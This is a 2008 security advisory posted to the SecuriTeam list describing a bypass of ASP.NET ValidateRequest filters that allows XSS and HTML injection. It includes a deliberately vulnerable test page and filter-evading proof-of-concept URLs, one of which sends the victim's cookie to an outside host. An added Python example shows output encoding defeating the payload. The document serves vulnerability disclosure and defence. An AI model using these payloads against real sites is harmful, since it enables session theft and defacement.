From: SecuriTeam [mailto:[EMAIL PROTECTED]
Sent: 29 August 2008 18:23
To: [EMAIL PROTECTED]
Subject: [NT] Microsoft ASP.NET ValidateRequest Filters Bypassing Allows XSS And HTML Injection Attacks


The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com 


- - - - - - - - -


Microsoft ASP.NET ValidateRequest Filters Bypassing Allows XSS And HTML Injection Attacks


By understanding how ASP.NET malicious request filtering works, ProCheckUp has
found that it is possible to bypass the ASP.NET ValidateRequest filters and
perform XSS and HTML injection even against systems protected with the
MS07-040 patch. That patch fixed the payload reported in ProCheckUp security
bulletin PR07-03.

It was possible to perform redirect, cookie theft, and unrestricted HTML
injection attacks against an ASP.NET application set up in a test
environment. ProCheckUp has also found this issue to be exploitable while
carrying out penetration tests on several customers' live environments.

Proof of concept:
In the following examples, 'test3.aspx' is a script that relies solely on the
ASP.NET ValidateRequest filters and returns user-supplied input back to the
browser.
<html> 
<head><title>test3.aspx</title><script>document.cookie='PCUSESSIONID=stealme
'</script></head> 
<body> 
<form action="test3.aspx" method="get"> 
Your name: <input type="text" name="fname" size="20" /> 
<input type="submit" value="Submit" /> 
</form> 
<% 
dim fname 
fname=Request.QueryString("fname") 
If fname<>"" Then 
Response.Write("Hello " & "<tagname " & fname & "!<br />") 
Response.Write("How are you today?") 
End If 
%> 
</body> 
</html> 

Alert box injection - simply provided for testing purposes (may cause DoS
issues on Internet Explorer) 
http://target.foo/test3.aspx?fname= 
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> 

Cookie stealing 
http://target.foo/test3.aspx?fname= 
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location= 
"http://www.procheckup.com/?sid="%2bdocument.cookie)> 

Consequences:
Attackers can potentially launch XSS and HTML injection attacks against
vulnerable applications that rely solely on the ASP.NET ValidateRequest
filters. Such code would run within the context of the target domain.

This type of attack can result in defacement of the target site, or the
redirection of confidential information (e.g. session IDs or passwords) to
unauthorised third parties.

Solution:
See the MSDN article "How To: Protect From Injection Attacks in ASP.NET"
<http://msdn.microsoft.com/en-us/library/bb355989.aspx> for more details.
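Added illustration (not part of the advisory or of ProCheckUp's code) of why the fix is output encoding rather than request blacklisting: a simplified, hypothetical ValidateRequest-style blacklist lets the advisory's first payload through, the page's raw concatenation turns it into a tag carrying a STYLE attribute, and HTML-encoding the value before writing it (Python's html.escape here; Server.HtmlEncode / HttpUtility.HtmlEncode in ASP.NET) leaves only text. The blacklist rules below are an assumption, not Microsoft's implementation.

```python
import html
import re

# First proof-of-concept value from the advisory, kept here only as a test input.
POC_PAYLOAD = "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>"

# Hypothetical stand-in for a ValidateRequest-style request blacklist.
# Assumption: it flags the usual tag-start forms ('<' followed by a letter,
# '</', '<!', '<?') and numeric entities ('&#'); it is not Microsoft's code.
_TAG_START = re.compile(r"<[A-Za-z/!?]|&#")


def blacklist_rejects(value: str) -> bool:
    """True when the stand-in filter would reject the request value."""
    return _TAG_START.search(value) is not None


def render_vulnerable(fname: str) -> str:
    """Mirror of test3.aspx: the raw value is concatenated right after '<tagname '."""
    return "Hello <tagname " + fname + "!<br />"


def render_hardened(fname: str) -> str:
    """Output-encode the value and place it in text content, not inside a tag.
    html.escape(quote=True) turns < > & " ' into entities; the ASP.NET
    counterpart is Server.HtmlEncode / HttpUtility.HtmlEncode."""
    return "Hello " + html.escape(fname, quote=True) + "!<br />"


def tags_in(markup: str) -> list[str]:
    """Tag-like tokens a lenient browser parser could see: the text after each
    '<' up to the next whitespace or '>'."""
    return re.findall(r"<([^\s>]+)", markup)


if __name__ == "__main__":
    print("filter rejects payload:", blacklist_rejects(POC_PAYLOAD))
    print("vulnerable tags:", tags_in(render_vulnerable(POC_PAYLOAD)))
    print("hardened tags:  ", tags_in(render_hardened(POC_PAYLOAD)))
```

The vulnerable rendering yields three tag-like tokens, the middle one carrying the STYLE attribute; the hardened rendering yields only the template's own `<br />`.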

References:
http://msdn.microsoft.com/en-us/library/bb355989.aspx
http://msdn.microsoft.com/en-us/library/ms972969.aspx#securitybarriers_topic6

Additional Information:
The information has been provided by ProCheckUp Research <mailto:[EMAIL PROTECTED]>.
The original article can be found at:
http://www.procheckup.com/Vulnerability_PR08-20.php


DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any
kind. 
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages. 





